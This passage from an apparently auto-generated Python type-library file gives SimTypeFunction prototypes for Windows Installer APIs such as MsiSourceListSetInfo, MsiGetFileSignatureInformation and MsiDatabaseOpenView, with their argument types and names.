'MsiSourceListClearMediaDiskA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="MSIINSTALLCONTEXT"), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProductCodeOrPatchCode", "szUserSid", "dwContext", "dwOptions", "dwDiskId"]),
#
'MsiSourceListClearMediaDiskW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="MSIINSTALLCONTEXT"), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProductCodeOrPatchCode", "szUserSid", "dwContext", "dwOptions", "dwDiskId"]),
#
'MsiSourceListClearAllExA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="MSIINSTALLCONTEXT"), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProductCodeOrPatchCode", "szUserSid", "dwContext", "dwOptions"]),
#
'MsiSourceListClearAllExW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="MSIINSTALLCONTEXT"), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProductCodeOrPatchCode", "szUserSid", "dwContext", "dwOptions"]),
#
'MsiSourceListForceResolutionExA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="MSIINSTALLCONTEXT"), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProductCodeOrPatchCode", "szUserSid", "dwContext", "dwOptions"]),
#
'MsiSourceListForceResolutionExW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="MSIINSTALLCONTEXT"), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProductCodeOrPatchCode", "szUserSid", "dwContext", "dwOptions"]),
#
'MsiSourceListSetInfoA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="MSIINSTALLCONTEXT"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProductCodeOrPatchCode", "szUserSid", "dwContext", "dwOptions", "szProperty", "szValue"]),
#
'MsiSourceListSetInfoW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="MSIINSTALLCONTEXT"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProductCodeOrPatchCode", "szUserSid", "dwContext", "dwOptions", "szProperty", "szValue"]),
#
'MsiSourceListGetInfoA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="MSIINSTALLCONTEXT"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProductCodeOrPatchCode", "szUserSid", "dwContext", "dwOptions", "szProperty", "szValue", "pcchValue"]),
#
'MsiSourceListGetInfoW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="MSIINSTALLCONTEXT"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProductCodeOrPatchCode", "szUserSid", "dwContext", "dwOptions", "szProperty", "szValue", "pcchValue"]),
#
'MsiSourceListEnumSourcesA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="MSIINSTALLCONTEXT"), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProductCodeOrPatchCode", "szUserSid", "dwContext", "dwOptions", "dwIndex", "szSource", "pcchSource"]),
#
'MsiSourceListEnumSourcesW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="MSIINSTALLCONTEXT"), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProductCodeOrPatchCode", "szUserSid", "dwContext", "dwOptions", "dwIndex", "szSource", "pcchSource"]),
#
'MsiSourceListEnumMediaDisksA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="MSIINSTALLCONTEXT"), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProductCodeOrPatchCode", "szUserSid", "dwContext", "dwOptions", "dwIndex", "pdwDiskId", "szVolumeLabel", "pcchVolumeLabel", "szDiskPrompt", "pcchDiskPrompt"]),
#
'MsiSourceListEnumMediaDisksW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="MSIINSTALLCONTEXT"), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProductCodeOrPatchCode", "szUserSid", "dwContext", "dwOptions", "dwIndex", "pdwDiskId", "szVolumeLabel", "pcchVolumeLabel", "szDiskPrompt", "pcchDiskPrompt"]),
#
'MsiGetFileVersionA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szFilePath", "lpVersionBuf", "pcchVersionBuf", "lpLangBuf", "pcchLangBuf"]),
#
'MsiGetFileVersionW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szFilePath", "lpVersionBuf", "pcchVersionBuf", "lpLangBuf", "pcchLangBuf"]),
#
'MsiGetFileHashA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimStruct({"dwFileHashInfoSize": SimTypeInt(signed=False, label="UInt32"), "dwData": SimTypeFixedSizeArray(SimTypeInt(signed=False, label="UInt32"), 4)}, name="MSIFILEHASHINFO", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szFilePath", "dwOptions", "pHash"]),
#
'MsiGetFileHashW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimStruct({"dwFileHashInfoSize": SimTypeInt(signed=False, label="UInt32"), "dwData": SimTypeFixedSizeArray(SimTypeInt(signed=False, label="UInt32"), 4)}, name="MSIFILEHASHINFO", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szFilePath", "dwOptions", "pHash"]),
#
'MsiGetFileSignatureInformationA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypePointer(SimStruct({"dwCertEncodingType": SimTypeInt(signed=False, label="UInt32"), "pbCertEncoded": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "cbCertEncoded": SimTypeInt(signed=False, label="UInt32"), "pCertInfo": SimTypePointer(SimStruct({"dwVersion": SimTypeInt(signed=False, label="UInt32"), "SerialNumber": SimStruct({"cbData": SimTypeInt(signed=False, label="UInt32"), "pbData": SimTypePointer(SimTypeChar(label="Byte"), offset=0)}, name="CRYPTOAPI_BLOB", pack=False, align=None), "SignatureAlgorithm": SimStruct({"pszObjId": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "Parameters": SimStruct({"cbData": SimTypeInt(signed=False, label="UInt32"), "pbData": SimTypePointer(SimTypeChar(label="Byte"), offset=0)}, name="CRYPTOAPI_BLOB", pack=False, align=None)}, name="CRYPT_ALGORITHM_IDENTIFIER", pack=False, align=None), "Issuer": SimStruct({"cbData": SimTypeInt(signed=False, label="UInt32"), "pbData": SimTypePointer(SimTypeChar(label="Byte"), offset=0)}, name="CRYPTOAPI_BLOB", pack=False, align=None), "NotBefore": SimStruct({"dwLowDateTime": SimTypeInt(signed=False, label="UInt32"), "dwHighDateTime": SimTypeInt(signed=False, label="UInt32")}, name="FILETIME", pack=False, align=None), "NotAfter": SimStruct({"dwLowDateTime": SimTypeInt(signed=False, label="UInt32"), "dwHighDateTime": SimTypeInt(signed=False, label="UInt32")}, name="FILETIME", pack=False, align=None), "Subject": SimStruct({"cbData": SimTypeInt(signed=False, label="UInt32"), "pbData": SimTypePointer(SimTypeChar(label="Byte"), offset=0)}, name="CRYPTOAPI_BLOB", pack=False, align=None), "SubjectPublicKeyInfo": SimStruct({"Algorithm": SimStruct({"pszObjId": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "Parameters": SimStruct({"cbData": SimTypeInt(signed=False, label="UInt32"), "pbData": 
SimTypePointer(SimTypeChar(label="Byte"), offset=0)}, name="CRYPTOAPI_BLOB", pack=False, align=None)}, name="CRYPT_ALGORITHM_IDENTIFIER", pack=False, align=None), "PublicKey": SimStruct({"cbData": SimTypeInt(signed=False, label="UInt32"), "pbData": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "cUnusedBits": SimTypeInt(signed=False, label="UInt32")}, name="CRYPT_BIT_BLOB", pack=False, align=None)}, name="CERT_PUBLIC_KEY_INFO", pack=False, align=None), "IssuerUniqueId": SimStruct({"cbData": SimTypeInt(signed=False, label="UInt32"), "pbData": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "cUnusedBits": SimTypeInt(signed=False, label="UInt32")}, name="CRYPT_BIT_BLOB", pack=False, align=None), "SubjectUniqueId": SimStruct({"cbData": SimTypeInt(signed=False, label="UInt32"), "pbData": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "cUnusedBits": SimTypeInt(signed=False, label="UInt32")}, name="CRYPT_BIT_BLOB", pack=False, align=None), "cExtension": SimTypeInt(signed=False, label="UInt32"), "rgExtension": SimTypePointer(SimStruct({"pszObjId": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "fCritical": SimTypeInt(signed=True, label="Int32"), "Value": SimStruct({"cbData": SimTypeInt(signed=False, label="UInt32"), "pbData": SimTypePointer(SimTypeChar(label="Byte"), offset=0)}, name="CRYPTOAPI_BLOB", pack=False, align=None)}, name="CERT_EXTENSION", pack=False, align=None), offset=0)}, name="CERT_INFO", pack=False, align=None), offset=0), "hCertStore": SimTypePointer(SimTypeBottom(label="Void"), offset=0)}, name="CERT_CONTEXT", pack=False, align=None), offset=0), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["szSignedObjectPath", "dwFlags", "ppcCertContext", "pbHashData", "pcbHashData"]),
#
'MsiGetFileSignatureInformationW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypePointer(SimStruct({"dwCertEncodingType": SimTypeInt(signed=False, label="UInt32"), "pbCertEncoded": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "cbCertEncoded": SimTypeInt(signed=False, label="UInt32"), "pCertInfo": SimTypePointer(SimStruct({"dwVersion": SimTypeInt(signed=False, label="UInt32"), "SerialNumber": SimStruct({"cbData": SimTypeInt(signed=False, label="UInt32"), "pbData": SimTypePointer(SimTypeChar(label="Byte"), offset=0)}, name="CRYPTOAPI_BLOB", pack=False, align=None), "SignatureAlgorithm": SimStruct({"pszObjId": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "Parameters": SimStruct({"cbData": SimTypeInt(signed=False, label="UInt32"), "pbData": SimTypePointer(SimTypeChar(label="Byte"), offset=0)}, name="CRYPTOAPI_BLOB", pack=False, align=None)}, name="CRYPT_ALGORITHM_IDENTIFIER", pack=False, align=None), "Issuer": SimStruct({"cbData": SimTypeInt(signed=False, label="UInt32"), "pbData": SimTypePointer(SimTypeChar(label="Byte"), offset=0)}, name="CRYPTOAPI_BLOB", pack=False, align=None), "NotBefore": SimStruct({"dwLowDateTime": SimTypeInt(signed=False, label="UInt32"), "dwHighDateTime": SimTypeInt(signed=False, label="UInt32")}, name="FILETIME", pack=False, align=None), "NotAfter": SimStruct({"dwLowDateTime": SimTypeInt(signed=False, label="UInt32"), "dwHighDateTime": SimTypeInt(signed=False, label="UInt32")}, name="FILETIME", pack=False, align=None), "Subject": SimStruct({"cbData": SimTypeInt(signed=False, label="UInt32"), "pbData": SimTypePointer(SimTypeChar(label="Byte"), offset=0)}, name="CRYPTOAPI_BLOB", pack=False, align=None), "SubjectPublicKeyInfo": SimStruct({"Algorithm": SimStruct({"pszObjId": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "Parameters": SimStruct({"cbData": SimTypeInt(signed=False, label="UInt32"), "pbData": 
SimTypePointer(SimTypeChar(label="Byte"), offset=0)}, name="CRYPTOAPI_BLOB", pack=False, align=None)}, name="CRYPT_ALGORITHM_IDENTIFIER", pack=False, align=None), "PublicKey": SimStruct({"cbData": SimTypeInt(signed=False, label="UInt32"), "pbData": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "cUnusedBits": SimTypeInt(signed=False, label="UInt32")}, name="CRYPT_BIT_BLOB", pack=False, align=None)}, name="CERT_PUBLIC_KEY_INFO", pack=False, align=None), "IssuerUniqueId": SimStruct({"cbData": SimTypeInt(signed=False, label="UInt32"), "pbData": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "cUnusedBits": SimTypeInt(signed=False, label="UInt32")}, name="CRYPT_BIT_BLOB", pack=False, align=None), "SubjectUniqueId": SimStruct({"cbData": SimTypeInt(signed=False, label="UInt32"), "pbData": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "cUnusedBits": SimTypeInt(signed=False, label="UInt32")}, name="CRYPT_BIT_BLOB", pack=False, align=None), "cExtension": SimTypeInt(signed=False, label="UInt32"), "rgExtension": SimTypePointer(SimStruct({"pszObjId": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "fCritical": SimTypeInt(signed=True, label="Int32"), "Value": SimStruct({"cbData": SimTypeInt(signed=False, label="UInt32"), "pbData": SimTypePointer(SimTypeChar(label="Byte"), offset=0)}, name="CRYPTOAPI_BLOB", pack=False, align=None)}, name="CERT_EXTENSION", pack=False, align=None), offset=0)}, name="CERT_INFO", pack=False, align=None), offset=0), "hCertStore": SimTypePointer(SimTypeBottom(label="Void"), offset=0)}, name="CERT_CONTEXT", pack=False, align=None), offset=0), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["szSignedObjectPath", "dwFlags", "ppcCertContext", "pbHashData", "pcbHashData"]),
#
'MsiGetShortcutTargetA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szShortcutPath", "szProductCode", "szFeatureId", "szComponentCode"]),
#
'MsiGetShortcutTargetW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szShortcutPath", "szProductCode", "szFeatureId", "szComponentCode"]),
#
'MsiIsProductElevatedA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProduct", "pfElevated"]),
#
'MsiIsProductElevatedW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProduct", "pfElevated"]),
#
'MsiNotifySidChangeA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["pOldSid", "pNewSid"]),
#
'MsiNotifySidChangeW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["pOldSid", "pNewSid"]),
#
'MsiBeginTransactionA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szName", "dwTransactionAttributes", "phTransactionHandle", "phChangeOfOwnerEvent"]),
#
'MsiBeginTransactionW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szName", "dwTransactionAttributes", "phTransactionHandle", "phChangeOfOwnerEvent"]),
#
'MsiEndTransaction': SimTypeFunction([SimTypeInt(signed=False, label="MSITRANSACTIONSTATE")], SimTypeInt(signed=False, label="UInt32"), arg_names=["dwTransactionState"]),
#
'MsiJoinTransaction': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hTransactionHandle", "dwTransactionAttributes", "phChangeOfOwnerEvent"]),
#
'MsiDatabaseOpenViewA': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hDatabase", "szQuery", "phView"]),
#
'MsiDatabaseOpenViewW': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hDatabase", "szQuery", "phView"]),
#
'MsiViewGetErrorA': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="MSIDBERROR"), arg_names=["hView", "szColumnNameBuffer", "pcchBuf"]),
#
'MsiViewGetErrorW': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="MSIDBERROR"), arg_names=["hView", "szColumnNameBuffer", "pcchBuf"]),
#
'MsiViewExecute': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hView", "hRecord"]),
#
'MsiViewFetch': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hView", "phRecord"]),
#
'MsiViewModify': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="MSIMODIFY"), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hView", "eModifyMode", "hRecord"]),
#
'MsiViewGetColumnInfo': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="MSICOLINFO"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hView", "eColumnInfo", "phRecord"]),
#
'MsiViewClose': SimTypeFunction([SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hView"]),
#
'MsiDatabaseGetPrimaryKeysA': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hDatabase", "szTableName", "phRecord"]),
#
'MsiDatabaseGetPrimaryKeysW': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hDatabase", "szTableName", "phRecord"]),
#
'MsiDatabaseIsTablePersistentA': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypeInt(signed=False, label="MSICONDITION"), arg_names=["hDatabase", "szTableName"]),
#
'MsiDatabaseIsTablePersistentW': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="MSICONDITION"), arg_names=["hDatabase", "szTableName"]),
#
'MsiGetSummaryInformationA': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hDatabase", "szDatabasePath", "uiUpdateCount", "phSummaryInfo"]),
#
'MsiGetSummaryInformationW': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hDatabase", "szDatabasePath", "uiUpdateCount", "phSummaryInfo"]),
#
'MsiSummaryInfoGetPropertyCount': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hSummaryInfo", "puiPropertyCount"]),
#
'MsiSummaryInfoSetPropertyA': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=True, label="Int32"), SimTypePointer(SimStruct({"dwLowDateTime": SimTypeInt(signed=False, label="UInt32"), "dwHighDateTime": SimTypeInt(signed=False, label="UInt32")}, name="FILETIME", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hSummaryInfo", "uiProperty", "uiDataType", "iValue", "pftValue", "szValue"]),
#
'MsiSummaryInfoSetPropertyW': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=True, label="Int32"), SimTypePointer(SimStruct({"dwLowDateTime": SimTypeInt(signed=False, label="UInt32"), "dwHighDateTime": SimTypeInt(signed=False, label="UInt32")}, name="FILETIME", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hSummaryInfo", "uiProperty", "uiDataType", "iValue", "pftValue", "szValue"]),
#
'MsiSummaryInfoGetPropertyA': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0), SimTypePointer(SimStruct({"dwLowDateTime": SimTypeInt(signed=False, label="UInt32"), "dwHighDateTime": SimTypeInt(signed=False, label="UInt32")}, name="FILETIME", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hSummaryInfo", "uiProperty", "puiDataType", "piValue", "pftValue", "szValueBuf", "pcchValueBuf"]),
#
'MsiSummaryInfoGetPropertyW': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0), SimTypePointer(SimStruct({"dwLowDateTime": SimTypeInt(signed=False, label="UInt32"), "dwHighDateTime": SimTypeInt(signed=False, label="UInt32")}, name="FILETIME", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hSummaryInfo", "uiProperty", "puiDataType", "piValue", "pftValue", "szValueBuf", "pcchValueBuf"]),
#
'MsiSummaryInfoPersist': SimTypeFunction([SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hSummaryInfo"]),
#
'MsiOpenDatabaseA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szDatabasePath", "szPersist", "phDatabase"]),
#
'MsiOpenDatabaseW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szDatabasePath", "szPersist", "phDatabase"]),
#
'MsiDatabaseImportA': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hDatabase", "szFolderPath", "szFileName"]),
#
